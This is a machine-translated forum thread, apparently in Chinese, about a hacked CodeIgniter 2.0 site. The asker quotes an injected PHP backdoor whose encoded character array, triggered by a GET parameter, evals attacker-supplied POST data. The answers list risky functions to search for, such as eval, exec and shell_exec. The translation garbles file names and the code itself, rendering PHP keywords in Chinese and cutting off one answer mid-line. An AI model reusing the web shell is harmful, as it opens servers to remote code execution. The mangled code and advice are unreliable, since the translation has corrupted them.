我有一个codeigniter 2.0。2个不断被黑客攻击的项目。有两个主要问题:
索引的开头。php文件据主机称,没有FTP日志表明这些文件已上载。
>
由于没有与流氓文件相关的FTP上传日志,这是否意味着它一定是通过网站本身(例如联系人或上传表单)进行的攻击?
该网站是共享主机-代码它可能是一个网站在同一台服务器上也被黑客,这是造成问题的原因?
如果我更改索引的文件名会有帮助吗。你想做点别的吗?
当index.php被修改时,我应该将其CHMOD为644吗?
我一直在寻找codeigniter项目的建议权限,但还没有找到。除了上传/日志目录(777)之外,我在考虑整个站点的644-这听起来可以吗?
代码注入到索引的顶部。php文件:
<代码>
然后是一个长preg_replace语句,后面是一个长编码字符串。接着是第二句话:
if(isset($\u GET[“w6914t”]){$d=substr(8,1);foreach(数组(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92110,34,46,3611601109112,41,59101120105116,59)作为$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1.c),$c);}评估($d);}
有一个联系人表单和一个用户可以使用CKFinder 2.0.1上传项目的表单。去更新一下,看看这是否能解决问题。
你可以做几件事:
。cache_123。php-这些脚本可能是后门脚本,尤其是以点开头的文件名,从而将其隐藏在(常规)文件系统中 base64\u decode,exec,preg\u replace,passthru,系统,shell\u exec,eval,文件管理员/li>
我知道这是一个旧线程,但我想添加一个选项来找出问题发生的原因和位置。
创建一个每次加载的钩子(无论在哪个阶段),并转储$this-
这样,你会很快看到问题是从哪里开始的。
我认为通过PHP应用程序而不是FTP服务器进行黑客攻击要容易得多。你有上传表格吗?如果无法使用VPS,请尝试要求主机将其移动到另一个共享服务器。
